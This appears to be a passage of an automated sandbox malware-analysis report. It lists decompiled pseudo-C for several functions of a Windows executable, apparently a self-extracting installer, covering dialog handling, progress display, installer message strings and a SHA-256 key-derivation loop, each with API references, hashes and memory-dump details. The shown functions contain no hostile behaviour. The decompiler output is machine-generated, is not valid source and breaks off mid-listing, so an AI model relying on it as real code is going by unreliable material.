				SendMessageW(GetDlgItem( *(_t21 + 4), _a4), 0xf4, 1, 1);
				return SetFocus(GetDlgItem( *(_t21 + 4), _a4));
			}




                                          0x0040779a
                                          0x004077b7
                                          0x004077c9
                                          0x004077d9
                                          0x004077ea
                                          0x00407800

                                          APIs
                                          • GetDlgItem.USER32 ref: 004077A4
                                          • SendMessageW.USER32(00000000,000000F4,00000000,00000001), ref: 004077B7
                                          • GetDlgItem.USER32 ref: 004077C1
                                          • SendMessageW.USER32(00000000,000000F4,00000000,00000001), ref: 004077C9
                                          • SendMessageW.USER32(?,00000401,00000000,00000000), ref: 004077D9
                                          • GetDlgItem.USER32 ref: 004077E2
                                          • SendMessageW.USER32(00000000,000000F4,00000001,00000001), ref: 004077EA
                                          • GetDlgItem.USER32 ref: 004077F3
                                          • SetFocus.USER32(00000000,?,?,00000000,00408432,000004B3,00000000,?,000004B3), ref: 004077F6
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.708893020.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000D.00000002.708888095.0000000000400000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708910578.000000000041D000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708919422.0000000000422000.00000004.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708925367.0000000000427000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: ItemMessageSend$Focus
                                          • String ID:
                                          • API String ID: 3946207451-0
                                          • Opcode ID: f19a9a918d10da5fb3fb5757492b0ffe053d75d493c3690a8f8b9be1a476dd90
                                          • Instruction ID: bb603a94b1fb933569e9f7d8bab768da8117728db550847b64ef16fbddfb16f4
                                          • Opcode Fuzzy Hash: f19a9a918d10da5fb3fb5757492b0ffe053d75d493c3690a8f8b9be1a476dd90
                                          • Instruction Fuzzy Hash: 40F04F716403087BEA212B61DD86F5BBB5EEF85B44F018425F750650F0CBB7EC109A28
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0040885E, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 111windowCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 82%
                                          			E0040885E(void* __ecx, void* __edx, void* __eflags, signed int _a4) {
				char _v16;
				short _v40;
				void* _t47;
				signed char _t58;
				intOrPtr* _t59;
				intOrPtr* _t61;
				void* _t88;
				intOrPtr* _t90;
				void* _t91;

				_t88 = __edx;
				_t91 = __ecx;
				E004147DF(_t47,  &_v16);
				_t90 = _a4;
				if(( *(__ecx + 0x60) |  *(__ecx + 0x64)) == 0) {
					_t9 =  &_a4;
					 *_t9 = _a4 & 0x00000000;
					__eflags =  *_t9;
				} else {
					_a4 = E0041C200(E0041C2B0( *_t90,  *((intOrPtr*)(_t90 + 4)), 0x7530, 0), _t88,  *((intOrPtr*)(_t91 + 0x60)),  *((intOrPtr*)(_t91 + 0x64)));
				}
				if(_a4 > 0x7530) {
					_a4 = 0x7530;
				}
				SendMessageW(GetDlgItem( *(_t91 + 4), 0x4b8), 0x402, _a4, 0);
				asm("cdq");
				wsprintfW( &_v40, L"%d%%", (_a4 + 0x12b) / 0x12c);
				if(( *0x42245c & 0x00000004) != 0) {
					E0040790B(GetDlgItem( *(_t91 + 4), 0x4b5),  &_v40);
				}
				_t58 =  *0x42245c; // 0x0
				if((_t58 & 0x00000002) == 0) {
					_t99 = _t58 & 0x00000001;
					if((_t58 & 0x00000001) == 0) {
						E00414864( &_v16,  &_v40);
						E00401585( &_v16, 0x20);
						_push( *0x42273c);
					} else {
						E00414864( &_v16,  *0x42273c);
						E00401585( &_v16, 0x20);
						_push( &_v40);
					}
					E00414922( &_v16);
					_t58 = E00407F52(_t91, _t99, _v16);
				}
				if( *((intOrPtr*)(_t91 + 0x70)) != 0) {
					_t59 =  *((intOrPtr*)(_t91 + 0x70));
					 *((intOrPtr*)( *_t59 + 0x28))(_t59,  *(_t91 + 4), 2);
					_t61 =  *((intOrPtr*)(_t91 + 0x70));
					_t58 =  *((intOrPtr*)( *_t61 + 0x24))(_t61,  *(_t91 + 4),  *_t90,  *((intOrPtr*)(_t90 + 4)),  *((intOrPtr*)(_t91 + 0x60)),  *((intOrPtr*)(_t91 + 0x64)));
				}
				_push(_v16);
				L0041C160();
				return _t58;
			}












                                          0x0040885e
                                          0x00408866
                                          0x0040886c
                                          0x00408877
                                          0x0040887f
                                          0x004088a0
                                          0x004088a0
                                          0x004088a0
                                          0x00408881
                                          0x0040889b
                                          0x0040889b
                                          0x004088a7
                                          0x004088a9
                                          0x004088a9
                                          0x004088c7
                                          0x004088d5
                                          0x004088e7
                                          0x004088f7
                                          0x0040890a
                                          0x0040890a
                                          0x0040890f
                                          0x00408916
                                          0x0040891b
                                          0x0040891d
                                          0x0040893e
                                          0x00408948
                                          0x0040894d
                                          0x0040891f
                                          0x00408925
                                          0x0040892f
                                          0x00408937
                                          0x00408937
                                          0x00408956
                                          0x00408960
                                          0x00408960
                                          0x00408969
                                          0x0040896b
                                          0x00408976
                                          0x0040897c
                                          0x0040898d
                                          0x0040898d
                                          0x00408990
                                          0x00408993
                                          0x0040899d

                                          APIs
                                            • Part of subcall function 004147DF: ??2@YAPAXI@Z.MSVCRT ref: 004147E7
                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00408896
                                            • Part of subcall function 00414864: ??2@YAPAXI@Z.MSVCRT ref: 00414896
                                            • Part of subcall function 00414864: ??3@YAXPAX@Z.MSVCRT ref: 0041489F
                                            • Part of subcall function 00414864: memcpy.MSVCRT ref: 004148B7
                                          • GetDlgItem.USER32 ref: 004088BA
                                          • SendMessageW.USER32(00000000,00000402,00000000,00000000), ref: 004088C7
                                          • wsprintfW.USER32 ref: 004088E7
                                          • GetDlgItem.USER32 ref: 00408905
                                          • ??3@YAXPAX@Z.MSVCRT ref: 00408993
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.708893020.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000D.00000002.708888095.0000000000400000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708910578.000000000041D000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708919422.0000000000422000.00000004.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708925367.0000000000427000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: ??2@??3@Item$MessageSendUnothrow_t@std@@@__ehfuncinfo$??2@memcpywsprintf
                                          • String ID: %d%%
                                          • API String ID: 3036602612-1518462796
                                          • Opcode ID: 2f025100284f857c739fb0d10ddfcf10120c0a6e4a94bd107c0a039dcf2897a2
                                          • Instruction ID: 432b5be96da59719ee59c1cdf104f12e765a410818bb6324a0b4774a71f17581
                                          • Opcode Fuzzy Hash: 2f025100284f857c739fb0d10ddfcf10120c0a6e4a94bd107c0a039dcf2897a2
                                          • Instruction Fuzzy Hash: 7C41C3B1900708BFDB11ABA0CD45EDAB7B5FF48704F10842EF682662E1DB79E951CB58
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00409D15, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 87COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 82%
                                          			E00409D15(void* __ecx, void* __edx, void* __eflags) {
				intOrPtr* _t44;
				void* _t46;
				intOrPtr* _t48;
				void* _t49;
				void* _t52;
				WCHAR* _t71;
				intOrPtr _t74;
				void* _t77;
				void* _t79;
				void* _t80;
				void* _t82;

				_t82 = __eflags;
				_t77 = _t79 - 0x78;
				_t80 = _t79 - 0x88;
				_t52 = __ecx;
				 *((intOrPtr*)(_t77 + 0x3c)) = 0;
				 *((intOrPtr*)(_t77 + 0x44)) = 0;
				 *((intOrPtr*)(_t77 + 0x48)) = 0;
				 *((intOrPtr*)(_t77 + 0x4c)) = 0;
				 *((intOrPtr*)(_t77 + 0x50)) = 0;
				 *((intOrPtr*)(_t77 + 0x54)) = 0;
				 *((intOrPtr*)(_t77 + 0x58)) = 0;
				E004147DF(0, _t77 + 0x5c);
				_t74 = E004099C9(_t77 + 0x5c, __edx, _t82);
				if(_t74 != 0xffffffff) {
					 *((intOrPtr*)(_t77 + 0x74)) = _t74;
					E004147DF(_t36, _t77 + 0x68);
					_push(_t74);
					_t71 = L".%03u";
					while(1) {
						wsprintfW(_t77 - 0x10, _t71);
						_t80 = _t80 + 0xc;
						_t69 = _t77 + 0x5c;
						E00414864(_t77 + 0x68,  *((intOrPtr*)(E00414787(_t77 + 0x30, _t77 + 0x5c, _t77 - 0x10))));
						_push( *((intOrPtr*)(_t77 + 0x30)));
						L0041C160();
						_t44 = E00409931(_t77 + 0x3c,  *((intOrPtr*)(_t77 + 0x68)), _t77 + 0x3c);
						__eflags = _t44;
						if(_t44 != 0) {
							break;
						}
						_t46 = E00409CEB(_t77 + 0x3c, _t52 + 0x1c, _t69, _t77 + 0x3c);
						_push( *((intOrPtr*)(_t77 + 0x68)));
						L0041C160();
						_t17 = _t77 + 0x74;
						 *_t17 =  *((intOrPtr*)(_t77 + 0x74)) + 1;
						__eflags =  *_t17;
						E004147DF(_t46, _t77 + 0x68);
						_push( *((intOrPtr*)(_t77 + 0x74)));
					}
					_push( *((intOrPtr*)(_t77 + 0x68)));
					L0041C160();
					_push( *((intOrPtr*)(_t77 + 0x5c)));
					L0041C160();
					_t48 =  *((intOrPtr*)(_t77 + 0x3c));
					__eflags = _t48;
					if(_t48 != 0) {
						 *((intOrPtr*)( *_t48 + 8))(_t48);
					}
					_t49 = 1;
				} else {
					_push( *((intOrPtr*)(_t77 + 0x5c)));
					L0041C160();
					_t49 = 0;
				}
				return _t49;
			}














                                          0x00409d15
                                          0x00409d16
                                          0x00409d1a
                                          0x00409d23
                                          0x00409d29
                                          0x00409d2c
                                          0x00409d2f
                                          0x00409d32
                                          0x00409d35
                                          0x00409d38
                                          0x00409d3b
                                          0x00409d3e
                                          0x00409d4b
                                          0x00409d50
                                          0x00409d66
                                          0x00409d69
                                          0x00409d6e
                                          0x00409d75
                                          0x00409d9f
                                          0x00409da4
                                          0x00409da6
                                          0x00409dad
                                          0x00409dbd
                                          0x00409dc2
                                          0x00409dc5
                                          0x00409dd4
                                          0x00409dd9
                                          0x00409ddb
                                          0x00000000
                                          0x00000000
                                          0x00409d83
                                          0x00409d88
                                          0x00409d8b
                                          0x00409d90
                                          0x00409d90
                                          0x00409d90
                                          0x00409d97
                                          0x00409d9c
                                          0x00409d9c
                                          0x00409ddd
                                          0x00409de0
                                          0x00409de5
                                          0x00409de8
                                          0x00409ded
                                          0x00409df3
                                          0x00409df5
                                          0x00409dfa
                                          0x00409dfa
                                          0x00409dfd
                                          0x00409d52
                                          0x00409d52
                                          0x00409d55
                                          0x00409d5b
                                          0x00409d5b
                                          0x00409e05

                                          APIs
                                            • Part of subcall function 004147DF: ??2@YAPAXI@Z.MSVCRT ref: 004147E7
                                            • Part of subcall function 004099C9: ??3@YAXPAX@Z.MSVCRT ref: 00409A4E
                                            • Part of subcall function 004099C9: _wtol.MSVCRT(?,?,00000002,-00000002,?,?,00422844,00000000), ref: 00409A77
                                            • Part of subcall function 004099C9: ??3@YAXPAX@Z.MSVCRT ref: 00409B08
                                          • ??3@YAXPAX@Z.MSVCRT ref: 00409D55
                                          • wsprintfW.USER32 ref: 00409DA4
                                          • ??3@YAXPAX@Z.MSVCRT ref: 00409DC5
                                          • ??3@YAXPAX@Z.MSVCRT ref: 00409DE0
                                          • ??3@YAXPAX@Z.MSVCRT ref: 00409DE8
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.708893020.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000D.00000002.708888095.0000000000400000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708910578.000000000041D000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708919422.0000000000422000.00000004.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708925367.0000000000427000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: ??3@$??2@_wtolwsprintf
                                          • String ID: .%03u
                                          • API String ID: 2619731350-3746577511
                                          • Opcode ID: d9da517446e7d22e7b0168033926e92862007eaf4458fa90e29128767b03b01d
                                          • Instruction ID: 0034a0038c25d7715fb85f134ff920e9ad4cb3cd18a2976f835199771390e190
                                          • Opcode Fuzzy Hash: d9da517446e7d22e7b0168033926e92862007eaf4458fa90e29128767b03b01d
                                          • Instruction Fuzzy Hash: 8F313671540218AFCF04EF65DC818EE3BA9EF04314B10403BFC25922A2EB39DD86CB88
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 004079E9, Relevance: 12.1, APIs: 8, Instructions: 66COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E004079E9(intOrPtr __ecx, WCHAR* _a4, void* _a8, void* _a12, signed int _a16) {
				struct HDC__* _v8;
				signed int _v12;
				intOrPtr _v16;
				struct HDC__* _t31;
				int _t33;
				int _t35;
				void* _t45;
				long _t47;
				long _t53;
				struct tagRECT* _t57;

				_v12 = _v12 & 0x00000000;
				_v16 = __ecx;
				_t31 = GetDC( *(__ecx + 4));
				_v8 = _t31;
				if(_t31 != 0) {
					_t33 = GetSystemMetrics(0xb);
					_t45 = 0xffffffc4;
					_t53 = _t45 - _t33 + GetSystemMetrics(0x3d);
					_t35 = GetSystemMetrics(0x3e);
					_t57 = _a8;
					_t10 = _t35 - 0x78; // -120
					_t47 = _t10;
					_t57->bottom = 0;
					_t57->top = 0;
					_t57->left = 0;
					_t57->right = _t53;
					_a8 = SelectObject(_v8, _a12);
					_v12 = 0 | DrawTextW(_v8, _a4, 0xffffffff, _t57, _a16 | 0x00000400) > 0x00000000;
					if(_t53 < _t57->right) {
						_t57->right = _t53;
					}
					if(_t47 < _t57->bottom) {
						_t57->bottom = _t47;
					}
					SelectObject(_v8, _a8);
					ReleaseDC( *(_v16 + 4), _v8);
				}
				return _v12;
			}













                                          0x004079f2
                                          0x004079f6
                                          0x004079f9
                                          0x004079ff
                                          0x00407a04
                                          0x00407a15
                                          0x00407a19
                                          0x00407a22
                                          0x00407a25
                                          0x00407a2a
                                          0x00407a30
                                          0x00407a30
                                          0x00407a35
                                          0x00407a38
                                          0x00407a3b
                                          0x00407a3d
                                          0x00407a46
                                          0x00407a68
                                          0x00407a6e
                                          0x00407a70
                                          0x00407a70
                                          0x00407a76
                                          0x00407a78
                                          0x00407a78
                                          0x00407a81
                                          0x00407a90
                                          0x00407a98
                                          0x00407a9d

                                          APIs
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.708893020.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000D.00000002.708888095.0000000000400000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708910578.000000000041D000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708919422.0000000000422000.00000004.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708925367.0000000000427000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: MetricsSystem$ObjectSelect$DrawReleaseText
                                          • String ID:
                                          • API String ID: 2466489532-0
                                          • Opcode ID: 32584a4472645db3aff27f6520096e7dc3bbedd979ffd5018345eaf338595b88
                                          • Instruction ID: d7a645f58c53ce30d97dd646464eddd9bcb9b2579cd2f157b80914e8c8c63eec
                                          • Opcode Fuzzy Hash: 32584a4472645db3aff27f6520096e7dc3bbedd979ffd5018345eaf338595b88
                                          • Instruction Fuzzy Hash: 642138B1D00209EFCB11DFA5DD84A8EBFF4EF08364F10C46AE429A62A0C735AA51DF50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00409F61, Relevance: 10.7, APIs: 1, Strings: 6, Instructions: 166sleepCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 85%
                                          			E00409F61() {
				signed int _v8;
				intOrPtr _v32;
				intOrPtr _v36;
				char _v88;
				char _v92;
				signed int _t25;
				signed int _t30;
				void* _t33;
				signed short* _t39;

				_v8 = _v8 & 0x00000000;
				_t39 =  *0x4228dc; // 0x9d2808
				_t25 =  *_t39 & 0x0000ffff;
				if(_t25 == 0) {
					L46:
					return _v8;
				} else {
					_t30 = 0x64;
					do {
						_t33 = (_t25 & 0x0000ffff) + 0xffffffbe;
						if(_t33 > 0x38) {
							goto L44;
						}
						switch( *((intOrPtr*)(( *(_t33 + 0x40a1e1) & 0x000000ff) * 4 +  &M0040A1B5))) {
							case 0:
								if(E00404F59() == 0) {
									if( *_t39 != 0x42) {
										_v8 = _t30;
									} else {
										_t27 = L"BeginPrompt";
									}
								}
								_t36 =  *0x422738; // 0x22109c0
								E00408B40(_t36, _t27);
								goto L44;
							case 1:
								__eflags =  *0x42245c & 0x00000100;
								if(__eflags != 0) {
									L12:
									__ecx =  &_v88;
									__eax = E004075CF( &_v88, __edx, __eflags);
									__ecx =  &_v88;
									_v88 = 0x41ef68;
									__eax = E00407FA3(0);
									goto L13;
								}
								__eflags = __ax - 0x43;
								if(__eflags == 0) {
									goto L12;
								}
								goto L11;
							case 2:
								__eflags =  *0x422770 - 2;
								if( *0x422770 != 2) {
									L20:
									__eax = E00408C2E(__edx);
									goto L44;
								}
								__eflags = __ax - 0x45;
								if(__eflags != 0) {
									goto L11;
								}
								goto L20;
							case 3:
								__edx = 0;
								__ecx = L"FinishMessage";
								__esi = E00404F59();
								__eflags = __esi;
								if(__esi == 0) {
									__eflags =  *__edi - 0x46;
									if( *__edi == 0x46) {
										__esi = L"FinishMessage";
									}
								}
								__eflags =  *0x422468;
								if(__eflags < 0) {
									 *0x422468 = 1;
									__eflags =  *0x422468;
								}
								if(__eflags > 0) {
									L31:
									__ecx =  &_v88;
									__eax = E004075CF( &_v88, __edx, __eflags);
									__ecx =  &_v88;
									_v88 = 0x41ebb4;
									_v32 = 0x7d5;
									__eax = E00407941( &_v88, 0x11,  *0x422738, __esi, 0);
									L13:
									__ecx =  &_v88;
									goto L14;
								} else {
									__eflags =  *__edi - 0x46;
									if(__eflags != 0) {
										goto L11;
									}
									goto L31;
								}
							case 4:
								__edx = 0;
								__ecx = L"HelpText";
								__eax = E00404F59();
								__esi = __eax;
								__eflags = __eax;
								if(__eflags != 0) {
									L36:
									__ecx =  &_v92;
									__eax = E004075CF( &_v92, __edx, __eflags);
									__ecx =  &_v92;
									_v92 = 0x41eaa0;
									_v36 = 0x7d6;
									__eax = E00407941( &_v92, 0x11,  *0x422738, __esi, 0);
									__ecx =  &_v92;
									L14:
									__eax = E00407630(__eax, __ecx);
									goto L44;
								}
								__eflags =  *__edi - 0x48;
								if(__eflags != 0) {
									L35:
									_v8 = __ebx;
									goto L36;
								}
								_push(0x18);
								_pop(__ecx);
								__eax = E00403CE0(L"HelpText");
								__esi = __eax;
								__eflags = __eax;
								if(__eflags != 0) {
									goto L36;
								}
								goto L35;
							case 5:
								__ecx =  *0x42245c;
								__ecx =  *0x42245c & 0x000000c0;
								__eflags = __cl - 0x80;
								if(__cl == 0x80) {
									L17:
									__edx =  *0x422748; // 0x9dbbc0
									__ecx =  *0x422754; // 0x9dbb90
									__eax = E00408BDB(__ecx, __edx);
									goto L44;
								}
								__eflags = __ax - 0x50;
								if(__eflags != 0) {
									goto L11;
								}
								goto L17;
							case 6:
								__esi = 0x4227f0;
								__ecx = 0x4227f0;
								__eax = E00408C93(0x4227f0, __edx, __eflags);
								do {
									Sleep(__ebx);
									__ecx = 0x4227f0;
									__eflags = E00407597(0x4227f0);
								} while (__eflags != 0);
								goto L44;
							case 7:
								__edx = 0;
								__ecx = L"WarningTitle";
								__eax = E00404F59();
								__eflags = __eax;
								if(__eax != 0) {
									L42:
									_push(0x2a);
									_pop(__ecx);
									__ecx = E00403CE0(__ecx);
									__eax = E00409617(__ecx, __edx, __eflags);
									goto L44;
								}
								__eflags =  *__edi - 0x57;
								if(__eflags != 0) {
									goto L11;
								}
								goto L42;
							case 8:
								__eax = E00401080(__edx, __eflags);
								goto L44;
							case 9:
								__edx = 0;
								__ecx = L"ErrorTitle";
								__eax = E00404F59();
								__eflags = __eax;
								if(__eax != 0) {
									L23:
									_push(0xf);
									_push(0);
									__eax = E00409684(__edx);
									_pop(__ecx);
									_pop(__ecx);
									goto L44;
								}
								__eflags =  *__edi - 0x5a;
								if(__eflags != 0) {
									L11:
									_v8 = __ebx;
									goto L44;
								}
								goto L23;
							case 0xa:
								goto L44;
						}
						L44:
						_t39 =  &(_t39[1]);
						_t25 =  *_t39 & 0x0000ffff;
					} while (_t25 != 0);
					goto L46;
				}
			}












                                          0x00409f67
                                          0x00409f6c
                                          0x00409f72
                                          0x00409f78
                                          0x0040a1ad
                                          0x0040a1b2
                                          0x00409f7e
                                          0x00409f82
                                          0x00409f83
                                          0x00409f86
                                          0x00409f8c
                                          0x00000000
                                          0x00000000
                                          0x00409f99
                                          0x00000000
                                          0x00409fb0
                                          0x00409fb6
                                          0x00409fbc
                                          0x00409fb8
                                          0x00409fb8
                                          0x00409fb8
                                          0x00409fb6
                                          0x00409fbf
                                          0x00409fc7
                                          0x00000000
                                          0x00000000
                                          0x00409fd1
                                          0x00409fdb
                                          0x00409feb
                                          0x00409feb
                                          0x00409fee
                                          0x00409ff5
                                          0x00409ff8
                                          0x00409fff
                                          0x00000000
                                          0x00409fff
                                          0x00409fdd
                                          0x00409fe1
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x0040a03e
                                          0x0040a045
                                          0x0040a04d
                                          0x0040a04d
                                          0x00000000
                                          0x0040a04d
                                          0x0040a047
                                          0x0040a04b
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x0040a081
                                          0x0040a083
                                          0x0040a08d
                                          0x0040a08f
                                          0x0040a091
                                          0x0040a093
                                          0x0040a097
                                          0x0040a099
                                          0x0040a099
                                          0x0040a097
                                          0x0040a09e
                                          0x0040a0a5
                                          0x0040a0a7
                                          0x0040a0b1
                                          0x0040a0b1
                                          0x0040a0b8
                                          0x0040a0c4
                                          0x0040a0c4
                                          0x0040a0c7
                                          0x0040a0d5
                                          0x0040a0da
                                          0x0040a0e1
                                          0x0040a0e8
                                          0x0040a004
                                          0x0040a004
                                          0x00000000
                                          0x0040a0ba
                                          0x0040a0ba
                                          0x0040a0be
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x0040a0be
                                          0x00000000
                                          0x0040a0f2
                                          0x0040a0f4
                                          0x0040a0f9
                                          0x0040a0fe
                                          0x0040a100
                                          0x0040a102
                                          0x0040a11b
                                          0x0040a11b
                                          0x0040a11e
                                          0x0040a12c
                                          0x0040a131
                                          0x0040a138
                                          0x0040a13f
                                          0x0040a144
                                          0x0040a007
                                          0x0040a007
                                          0x00000000
                                          0x0040a007
                                          0x0040a104
                                          0x0040a108
                                          0x0040a118
                                          0x0040a118
                                          0x00000000
                                          0x0040a118
                                          0x0040a10a
                                          0x0040a10c
                                          0x0040a10d
                                          0x0040a112
                                          0x0040a114
                                          0x0040a116
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x0040a011
                                          0x0040a017
                                          0x0040a01d
                                          0x0040a020
                                          0x0040a028
                                          0x0040a028
                                          0x0040a02e
                                          0x0040a034
                                          0x00000000
                                          0x0040a034
                                          0x0040a022
                                          0x0040a026
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x0040a14c
                                          0x0040a151
                                          0x0040a153
                                          0x0040a158
                                          0x0040a159
                                          0x0040a15f
                                          0x0040a166
                                          0x0040a166
                                          0x00000000
                                          0x00000000
                                          0x0040a16c
                                          0x0040a16e
                                          0x0040a173
                                          0x0040a178
                                          0x0040a17a
                                          0x0040a186
                                          0x0040a186
                                          0x0040a188
                                          0x0040a18e
                                          0x0040a190
                                          0x00000000
                                          0x0040a190
                                          0x0040a17c
                                          0x0040a180
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x0040a197
                                          0x00000000
                                          0x00000000
                                          0x0040a057
                                          0x0040a059
                                          0x0040a05e
                                          0x0040a063
                                          0x0040a065
                                          0x0040a071
                                          0x0040a071
                                          0x0040a073
                                          0x0040a075
                                          0x0040a07a
                                          0x0040a07b
                                          0x00000000
                                          0x0040a07b
                                          0x0040a067
                                          0x0040a06b
                                          0x00409fe3
                                          0x00409fe3
                                          0x00000000
                                          0x00409fe3
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x0040a19c
                                          0x0040a19c
                                          0x0040a19f
                                          0x0040a1a2
                                          0x00000000
                                          0x0040a1ac

                                          APIs
                                          • Sleep.KERNEL32(00000064,0042289C,00000000,00000000), ref: 0040A159
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.708893020.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000D.00000002.708888095.0000000000400000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708910578.000000000041D000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708919422.0000000000422000.00000004.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708925367.0000000000427000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: Sleep
                                          • String ID: BeginPrompt$ErrorTitle$FinishMessage$HelpText$WarningTitle$hA
                                          • API String ID: 3472027048-521349007
                                          • Opcode ID: 9c1cac134e722dcd1e5fd9c3bbf26f4cbc7f9728f35d472b3f288e2e11dd9c58
                                          • Instruction ID: 4f1981a800d2a26433a0518d47595aec0fb4d88ed4768baaab3659b3bb23ff90
                                          • Opcode Fuzzy Hash: 9c1cac134e722dcd1e5fd9c3bbf26f4cbc7f9728f35d472b3f288e2e11dd9c58
                                          • Instruction Fuzzy Hash: D051E670E043069ADB24EB5289117AE73B1AB90314F50803FE9467B2D5DBBC5E96C68F
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0040B810, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 121COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 94%
                                          			E0040B810(intOrPtr* __ecx) {
				void* _t48;
				void* _t58;
				signed int _t59;
				void* _t60;
				void* _t61;
				void* _t64;
				void* _t73;
				intOrPtr* _t90;
				intOrPtr* _t92;
				signed int _t95;
				void* _t97;
				void* _t98;

				_t92 = __ecx;
				if( *__ecx != 0x3f) {
					_t48 =  *((intOrPtr*)(__ecx + 4)) +  *((intOrPtr*)(__ecx + 0x1c)) + 8;
					_t64 = 0;
					 *(_t97 + 0x10) = _t48;
					if(_t48 != 0) {
						_push(_t48);
						L0041C16C();
						_t97 = _t97 + 4;
						_t64 = _t48;
					}
					memcpy(_t64, _t92 + 8,  *(_t92 + 4));
					memcpy(_t64 +  *(_t92 + 4),  *(_t92 + 0x18),  *(_t92 + 0x1c));
					_t90 = _t64 +  *(_t92 + 4) +  *(_t92 + 0x1c);
					 *_t90 = 0;
					 *((intOrPtr*)(_t90 + 4)) = 0;
					_t98 = _t97 + 0x18;
					 *((intOrPtr*)(_t98 + 0x1c)) = 0x6a09e667;
					 *((intOrPtr*)(_t98 + 0x20)) = 0xbb67ae85;
					 *((intOrPtr*)(_t98 + 0x24)) = 0x3c6ef372;
					 *((intOrPtr*)(_t98 + 0x28)) = 0xa54ff53a;
					 *((intOrPtr*)(_t98 + 0x2c)) = 0x510e527f;
					 *((intOrPtr*)(_t98 + 0x30)) = 0x9b05688c;
					 *((intOrPtr*)(_t98 + 0x34)) = 0x1f83d9ab;
					 *((intOrPtr*)(_t98 + 0x38)) = 0x5be0cd19;
					 *((intOrPtr*)(_t98 + 0x3c)) = 0;
					 *((intOrPtr*)(_t98 + 0x40)) = 0;
					_t95 = E0041C2F0(1,  *_t92, 0);
					 *(_t98 + 0x18) = 0;
					do {
						E0040B350(_t98 + 0x20, _t64,  *((intOrPtr*)(_t98 + 0x10)));
						_t58 = 0;
						while(1) {
							_t41 = _t58 + _t90;
							 *_t41 =  *((char*)(_t58 + _t90)) + 1;
							if( *_t41 != 0) {
								goto L14;
							}
							_t58 = _t58 + 1;
							if(_t58 < 8) {
								continue;
							}
							goto L14;
						}
						L14:
						_t59 =  *(_t98 + 0x18);
						_t95 = _t95 + 0xffffffff;
						asm("adc eax, 0xffffffff");
						 *(_t98 + 0x18) = _t59;
					} while ((_t95 | _t59) != 0);
					_t46 = _t98 + 0x1c; // 0x6a09e667
					_t60 = E0040B600(_t46, _t92 + 0x20);
					_push(_t64);
					L0041C160();
					return _t60;
				}
				_t61 = 0;
				if( *((intOrPtr*)(__ecx + 4)) > 0) {
					do {
						 *((char*)(__ecx + _t61 + 0x20)) =  *((intOrPtr*)(__ecx + _t61 + 8));
						_t61 = _t61 + 1;
					} while (_t61 <  *((intOrPtr*)(__ecx + 4)));
				}
				_t73 = 0;
				if( *(_t92 + 0x1c) <= 0) {
					L6:
					if(_t61 >= 0x20) {
						goto L16;
					} else {
						_t14 = _t92 + 0x20; // 0x21
						return memset(_t61 + _t14, 0, 0x20 - _t61);
					}
				} else {
					while(_t61 < 0x20) {
						 *((char*)(_t61 + _t92 + 0x20)) =  *((intOrPtr*)(_t73 +  *(_t92 + 0x18)));
						_t73 = _t73 + 1;
						_t61 = _t61 + 1;
						if(_t73 <  *(_t92 + 0x1c)) {
							continue;
						} else {
							goto L6;
						}
						goto L17;
					}
					L16:
					return _t61;
				}
				L17:
			}















                                          0x0040b814
                                          0x0040b819
                                          0x0040b87e
                                          0x0040b884
                                          0x0040b887
                                          0x0040b88d
                                          0x0040b88f
                                          0x0040b890
                                          0x0040b895
                                          0x0040b898
